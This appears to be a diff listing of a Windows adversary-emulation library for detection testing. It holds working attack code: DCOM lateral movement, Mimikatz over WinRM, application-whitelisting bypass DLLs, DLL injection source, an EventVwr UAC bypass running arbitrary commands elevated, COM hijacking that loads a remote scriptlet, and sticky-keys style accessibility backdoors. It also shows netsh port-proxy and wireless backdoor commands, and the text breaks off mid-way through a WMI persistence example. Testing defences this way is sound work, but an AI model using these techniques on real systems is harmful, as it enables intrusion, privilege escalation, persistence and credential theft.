### Powershell lateral movement using the mmc20 application com object
Input:
powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","<computer_name>")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
Reference:
https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/
### WMIC Process Call Create
wmic /user:<username> /password:<password> /node:<computer_name> process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"
### PowerSploit Invoke-Mimikatz WinRM
powershell-import /local/path/to/PowerSploit/Exfiltration/Invoke-Mimikatz.ps1
powershell Invoke-Mimikatz -ComputerName TARGET
Reference:
https://blog.cobaltstrike.com/2015/07/22/winrm-is-my-remote-access-tool/

BIN
Windows/Payloads/AllTheThings/AllTheThingsx64.dll Executable file
View File

Binary file not shown.

BIN
Windows/Payloads/AllTheThings/AllTheThingsx86.dll Executable file
View File

Binary file not shown.

134
Windows/Payloads/AllTheThings/Program.cs Executable file
View File

@ -0,0 +1,134 @@
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.EnterpriseServices;
// You will need Visual Studio and UnmanagedExports to build this binary
// Install-Package UnmanagedExports -Version 1.2.7
using RGiesecke.DllExport;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
For Testing Binary Application Whitelisting Controls
Includes 5 Known Application Whitelisting/ Application Control Bypass Techiniques in One File.
1. InstallUtil.exe
2. Regsvcs.exe
3. Regasm.exe
4. regsvr32.exe
5. rundll32.exe
Usage:
1.
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
2.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThings.dll
3.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
4.
regsvr32 /s /u AllTheThings.dll -->Calls DllUnregisterServer
regsvr32 /s AllTheThings.dll --> Calls DllRegisterServer
5.
rundll32 AllTheThings.dll,EntryPoint
*/
[assembly: ApplicationActivation(ActivationOption.Server)]
[assembly: ApplicationAccessControl(false)]
public class Program
{
public static void Main()
{
Console.WriteLine("Hello From Main...I Don't Do Anything");
//Add any behaviour here to throw off sandbox execution/analysts :)
}
}
public class Thing0
{
public static void Exec()
{
ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.FileName = "calc.exe";
Process.Start(startInfo);
}
}
[System.ComponentModel.RunInstaller(true)]
public class Thing1 : System.Configuration.Install.Installer
{
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
public override void Uninstall(System.Collections.IDictionary savedState)
{
Console.WriteLine("Hello There From Uninstall");
Thing0.Exec();
}
}
[ComVisible(true)]
[Guid("31D2B969-7608-426E-9D8E-A09FC9A51680")]
[ClassInterface(ClassInterfaceType.None)]
[ProgId("dllguest.Bypass")]
[Transaction(TransactionOption.Required)]
public class Bypass : ServicedComponent
{
public Bypass() { Console.WriteLine("I am a basic COM Object"); }
[ComRegisterFunction] //This executes if registration is successful
public static void RegisterClass(string key)
{
Console.WriteLine("I shouldn't really execute");
Thing0.Exec();
}
[ComUnregisterFunction] //This executes if registration fails
public static void UnRegisterClass(string key)
{
Console.WriteLine("I shouldn't really execute either.");
Thing0.Exec();
}
public void Exec() { Thing0.Exec(); }
}
class Exports
{
//
//
//rundll32 entry point
[DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
{
Thing0.Exec();
}
[DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
public static void DllRegisterServer()
{
Thing0.Exec();
}
[DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
public static void DllUnregisterServer()
{
Thing0.Exec();
}
}

18
Windows/Payloads/AllTheThings/test.bat Executable file
View File

@ -0,0 +1,18 @@
REM X86
Executing X86 AllTheThings Test
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
regsvr32.exe /s /u AllTheThingsx86.dll
regsvr32.exe /s AllTheThingsx86.dll
rundll32 AllTheThingsx86.dll,EntryPoint
REM AMD64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
regsvr32.exe /s /u AllTheThingsx64.dll
regsvr32.exe /s AllTheThingsx64.dll
rundll32 AllTheThingsx64.dll,EntryPoint

6
Windows/Payloads/AppInitInject.reg Normal file
View File

@ -0,0 +1,6 @@
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\Tools\\MessageBox64.dll,C:\\Tools\\MessageBox32.dll"
"LoadAppInit_DLLs"=dword:00000001
"RequireSignedAppInit_DLLs"=dword:00000000

22
Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct Executable file
View File

@ -0,0 +1,22 @@
<?XML version="1.0"?>
<scriptlet>
<registration
description="AtomicRedTeam"
progid="AtomicRedTeam"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
</registration>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

23
Windows/Payloads/COMHijackScripts/COMHijack.reg Executable file
View File

@ -0,0 +1,23 @@
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="AtomicRedTeam.1.00"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://gist.githubusercontent.com/subTee/91861699acaa1bd0da493c8a79035eb9/raw/bb38d92a543084207e0f14a1f2c4dde15db84659/AtomicRedTeam.sct"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="AtomicRedTeam"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
@="{00000001-0000-0000-0000-0000FEEDACDC}"

5
Windows/Payloads/COMHijackScripts/COMHijackCleanup.reg Executable file
View File

@ -0,0 +1,5 @@
Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
[-HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
[-HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]

3
Windows/Payloads/COMHijackScripts/test.bat Executable file
View File

@ -0,0 +1,3 @@
reg import COMHijack.reg
certutil.exe -CAInfo
reg import COMHijackCleanup.reg

84
Windows/Payloads/DllInject/DLLInjection.cs Executable file
View File

@ -0,0 +1,84 @@
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
// Source : http://www.codingvision.net/miscellaneous/c-inject-a-dll-into-a-process-w-createremotethread
// C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe DLLInjection.cs
// You will want to change target process, or dll name, depending on architecture.
// Sample DLL MessageBox Source From Here: https://github.com/enigma0x3/MessageBox . Thanks Matt ;-)
public class BasicInject
{
[DllImport("kernel32.dll")]
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess,
IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
// privileges
const int PROCESS_CREATE_THREAD = 0x0002;
const int PROCESS_QUERY_INFORMATION = 0x0400;
const int PROCESS_VM_OPERATION = 0x0008;
const int PROCESS_VM_WRITE = 0x0020;
const int PROCESS_VM_READ = 0x0010;
// used for memory allocation
const uint MEM_COMMIT = 0x00001000;
const uint MEM_RESERVE = 0x00002000;
const uint PAGE_READWRITE = 4;
public static int Main()
{
// the target process - I'm using a dummy process for this
// if you don't have one, open Task Manager and choose wisely
Process.Start("notepad");
Process targetProcess = Process.GetProcessesByName("notepad")[0];
// geting the handle of the process - with required privileges
IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id);
// searching for the address of LoadLibraryA and storing it in a pointer
IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
// name of the dll we want to inject
string dllName = "";
if(IntPtr.Size == 8)
{
dllName = "MessageBox64.dll";
}
else
{
dllName = "MessageBox32.dll";
}
// alocating some memory on the target process - enough to store the name of the dll
// and storing its address in a pointer
IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// writing the name of the dll there
UIntPtr bytesWritten;
WriteProcessMemory(procHandle, allocMemAddress, Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), out bytesWritten);
// creating a thread that will call LoadLibraryA with allocMemAddress as argument
CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr, allocMemAddress, 0, IntPtr.Zero);
return 0;
}
}

BIN
Windows/Payloads/DllInject/MessageBox32.dll Executable file
View File

Binary file not shown.

BIN
Windows/Payloads/DllInject/MessageBox64.dll Executable file
View File

Binary file not shown.

45
Windows/Payloads/InstallUtilBypass.cs Normal file
View File

@ -0,0 +1,45 @@
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:InstallUtilBypass.exe InstallUtilBypass.cs
Step Two:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false InstallUtilBypass.exe
*/
public class Program
{
public static void Main()
{
Console.WriteLine("Hey There From Main()");
//Add any behaviour here to throw off sandbox execution/analysts :)
//These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked
//by InstallUtil.exe
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
public override void Uninstall(System.Collections.IDictionary savedState)
{
Console.WriteLine("Hello There From Uninstall, If you are reading this, prevention has failed.");
}
}

47
Windows/Payloads/MSBuildBypass.csproj Normal file
View File

@ -0,0 +1,47 @@
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj -->
<!-- Feel free to use a more aggressive class for testing. -->
<Target Name="Hello">
<FragmentExample />
<ClassExample />
</Target>
<UsingTask
TaskName="FragmentExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<ParameterGroup/>
<Task>
<Using Namespace="System" />
<Code Type="Fragment" Language="cs">
<![CDATA[
Console.WriteLine("Hello From a Code Fragment");
]]>
</Code>
</Task>
</UsingTask>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<!-- <Reference Include="System.IO" /> Example Include -->
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
public override bool Execute()
{
Console.WriteLine("Hello From a Class.");
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>

50
Windows/Payloads/RegSvcsRegAsmBypass.cs Normal file
View File

@ -0,0 +1,50 @@
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Create Your Strong Name Key -> key.snk
From PowerShell.exe
Step One: Creates a Strong Name Key.
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4='
$Content = [System.Convert]::FromBase64String($key)
Set-Content key.snk -Value $Content -Encoding Byte
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library /out:regsvcs.dll /keyfile:key.snk RegSvcsRegaAsmBypass.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe regsvcs.dll
[OR]
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe regsvcs.dll
//Executes UnRegisterClass If you don't have permissions
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe /U regsvcs.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U regsvcs.dll
//This calls the UnregisterClass Method
*/
namespace regsvcser
{
public class Bypass : ServicedComponent
{
public Bypass() { Console.WriteLine("I am a basic COM Object"); }
[ComRegisterFunction] //This executes if registration is successful
public static void RegisterClass ( string key )
{
Console.WriteLine("I shouldn't really execute");
}
[ComUnregisterFunction] //This executes if registration fails
public static void UnRegisterClass ( string key )
{
Console.WriteLine("I shouldn't really execute either.");
}
}
}

23
Windows/Payloads/RegSvr32.sct Normal file
View File

@ -0,0 +1,23 @@
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
<!-- .sct files when downloaded, are executed from a path like this -->
<!-- Please Note, file extenstion does not matter -->
<!-- Though, the name and extension are arbitary.. -->
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
<!-- You can either execute locally, or from a url -->
<script language="JScript">
<![CDATA[
// calc.exe should launch, this could be any arbitrary code.
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

92
Windows/Payloads/UACBypass/Invoke-EventVwrBypass.ps1 Normal file
View File

@ -0,0 +1,92 @@
function Invoke-EventVwrBypass {
<#
.SYNOPSIS
Bypasses UAC by performing an image hijack on the .msc file extension
Expected to work on Win7, 8.1 and Win10
Only tested on Windows 7 and Windows 10
Author: Matt Nelson (@enigma0x3)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
Source: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
.PARAMETER Command
Specifies the command you want to run in a high-integrity context. For example, you can pass it powershell.exe followed by any encoded command "powershell -enc <encodedCommand>"
.EXAMPLE
Invoke-EventVwrBypass -Command "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc IgBJAHMAIABFAGwAZQB2AGEAdABlAGQAOgAgACQAKAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAnAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAJwApACkAIAAtACAAJAAoAEcAZQB0AC0ARABhAHQAZQApACIAIAB8ACAATwB1AHQALQBGAGkAbABlACAAQwA6AFwAVQBBAEMAQgB5AHAAYQBzAHMAVABlAHMAdAAuAHQAeAB0ACAALQBBAHAAcABlAG4AZAA="
This will write out "Is Elevated: True" to C:\UACBypassTest.
#>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'Medium')]
Param (
[Parameter(Mandatory = $True)]
[ValidateNotNullOrEmpty()]
[String]
$Command,
[Switch]
$Force
)
$ConsentPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
$SecureDesktopPrompt = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).PromptOnSecureDesktop
if($ConsentPrompt -Eq 2 -And $SecureDesktopPrompt -Eq 1){
"UAC is set to 'Always Notify'. This module does not bypass this setting."
exit
}
else{
#Begin Execution
$mscCommandPath = "HKCU:\Software\Classes\mscfile\shell\open\command"
$Command = $pshome + '\' + $Command
#Add in the new registry entries to hijack the msc file
if ($Force -or ((Get-ItemProperty -Path $mscCommandPath -Name '(default)' -ErrorAction SilentlyContinue) -eq $null)){
New-Item $mscCommandPath -Force |
New-ItemProperty -Name '(Default)' -Value $Command -PropertyType string -Force | Out-Null
}else{
Write-Warning "Key already exists, consider using -Force"
exit
}
if (Test-Path $mscCommandPath) {
Write-Verbose "Created registry entries to hijack the msc extension"
}else{
Write-Warning "Failed to create registry key, exiting"
exit
}
$EventvwrPath = Join-Path -Path ([Environment]::GetFolderPath('System')) -ChildPath 'eventvwr.exe'
#Start Event Viewer
if ($PSCmdlet.ShouldProcess($EventvwrPath, 'Start process')) {
$Process = Start-Process -FilePath $EventvwrPath -PassThru
Write-Verbose "Started eventvwr.exe"
}
#Sleep 5 seconds
Write-Verbose "Sleeping 5 seconds to trigger payload"
if (-not $PSBoundParameters['WhatIf']) {
Start-Sleep -Seconds 5
}
$mscfilePath = "HKCU:\Software\Classes\mscfile"
if (Test-Path $mscfilePath) {
#Remove the registry entry
Remove-Item $mscfilePath -Recurse -Force
Write-Verbose "Removed registry entries"
}
if(Get-Process -Id $Process.Id -ErrorAction SilentlyContinue){
Stop-Process -Id $Process.Id
Write-Verbose "Killed running eventvwr process"
}
}
}

31
Windows/Persistence/Accessibility_Features.md Normal file
View File

@ -0,0 +1,31 @@
## Accessibility Features
MITRE ATT&CK Technique: [T1015](https://attack.mitre.org/wiki/Technique/T1015)
### osk.exe swap
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
### sethc.exe swap
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
### utilman.exe swap
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
### magnify.exe swap
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
### narrator.exe swap
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
### DisplaySwitch.exe swap
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
### AtBroker.exe swap
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AtBroker.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f

24
Windows/Persistence/AppInit_DLLs.md Normal file
View File

@ -0,0 +1,24 @@
## AppInit DLLs
MITRE ATT&CK Technique: [T1103](https://attack.mitre.org/wiki/Technique/T1103)
#### AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
#### LoadAppInit_DLLs (REG_DWORD) Globally enables or disables AppInit_DLLs.
0x0 AppInit_DLLs are disabled.
0x1 AppInit_DLLs are enabled.
#### AppInit_DLLs (REG_SZ) Space or comma delimited list of DLLs to load. The complete path to the DLL should be specified using Short Names.
C:\ PROGRA~1\WID288~1\MICROS~1.DLL
##### RequireSignedAppInit_DLLs (REG_DWORD) Only load code-signed DLLs. 0x0 Load any DLLs.
0x1 Load only code-signed DLLs.
## Test Script
[AppInitInject.reg](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AppInitInject.reg)

17
Windows/Persistence/Application_Shimming.md Normal file
View File

@ -0,0 +1,17 @@
## Application Shimming
MITRE ATT&CK Technique: [T1138](https://attack.mitre.org/wiki/Technique/T1138)
#### Deploying a custom shim database to users requires the following actions:
##### 1.) Placing the custom shim database (*.sdb file) in a location to which the users computer has access (either locally or on the network)
##### 2.) Possibly calling the sdbinst.exe command-line utility to install the custom shim database locally.
##### 3.) Registry Modification - This is completed either manually or by an installation tool.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB
#### Detecting the shim execution is difficult. We suggest detection of Shim Installation.

5
Windows/Persistence/Authentication_Package.md Normal file
View File

@ -0,0 +1,5 @@
## Authentication Package
MITRE ATT&CK Technique: [T1131](https://attack.mitre.org/wiki/Technique/T1131)
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\

13
Windows/Persistence/Change_Default_File_Association.md Normal file
View File

@ -0,0 +1,13 @@
# Change Default File Association
MITRE ATT&CK Technique: [T1042](https://attack.mitre.org/wiki/Technique/T1042)
## User file association preferences are stored under
[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
Changes to a user's preference will occur under this entry's subkeys.
## Change association with assoc.exe
cmd.exe assoc .wav="C:\Program Files\Windows Media Player\wmplayer.exe"

17
Windows/Persistence/Component_Object_Model_Hijacking.md Normal file
View File

@ -0,0 +1,17 @@
# Component Object Model Hijacking
MITRE ATT&CK Technique: [T1122](https://attack.mitre.org/wiki/Technique/T1122)
## The search order for locating COM Objects can be hijacked, causing unauthorized code to execute.
#### The presence of objects within
HKEY_CURRENT_USER\Software\Classes\CLSID\
#### May be anomalous and should be investigated since user objects will be loaded prior to machine objects in
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\
## Test Script
[COM Hijack Scripts](https://github.com/redcanaryco/atomic-red-team/tree/master/Windows/Payloads/COMHijackScripts)

53
Windows/Persistence/Netsh_Helper_DLL.md Normal file
View File

@ -0,0 +1,53 @@
# Netsh Helper DLL
MITRE ATT&CK Technique: [T1128](https://attack.mitre.org/wiki/Technique/T1128)
## A DLL can be registered to be loaded each time netsh.exe is executed, or for certain events.
Netsh interacts with other operating system components using dynamic-link library (DLL) files. Each Netsh helper DLL provides an extensive set of features called a context, which is a group of commands specific to a networking component. For example, Dhcpmon.dll provides netsh the context and set of commands necessary to configure and manage DHCP servers.
## Attackers can register a netsh helper with this command
netsh.exe add helper C:\Path\file.dll
## The following registry key stores the paths to the helpers
HKLM\SOFTWARE\Microsoft\Netsh
## Additional Netsh.exe testing we recommend
### Firewall Control
Input:
netsh firewall set opmode [disable|enable]
### Netsh.exe Pivoting
Input:
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
Can also support v4tov6, v6tov6, and v6tov4
### Netsh.exe Sniffing
Input:
netsh trace start capture=yes overwrite=no tracefile=<FilePath.etl>
to stop:
netsh trace stop
### Netsh.exe Wireless backdoor
Input:
netsh wlan set hostednetwork mode=[allow\|disallow]
netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent\|temporary
netsh wlan [start|stop] hostednetwork
Enables or disables hostednetwork service.
Complete hosted network setup for creating a wireless backdoor.
Starts or stops a wireless backdoor. See below to set it up.

9
Windows/Persistence/Scheduled_Task.md Normal file
View File

@ -0,0 +1,9 @@
## Scheduled Task
MITRE ATT&CK Technique: [T1053](https://attack.mitre.org/wiki/Technique/T1053)
### Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time
[Examples Of Creating Tasks](https://technet.microsoft.com/en-us/library/cc725744(v=ws.11).aspx#BKMK_create)

53
Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md Normal file
View File

@ -0,0 +1,53 @@
## Windows Management Instrumentation Event Subscription
MITRE ATT&CK Technique: [T1084](https://attack.mitre.org/wiki/Technique/T1084)
### Persistence
Example:
```powershell
#Run from an administrator powershell window
#Code references
#https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
#https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
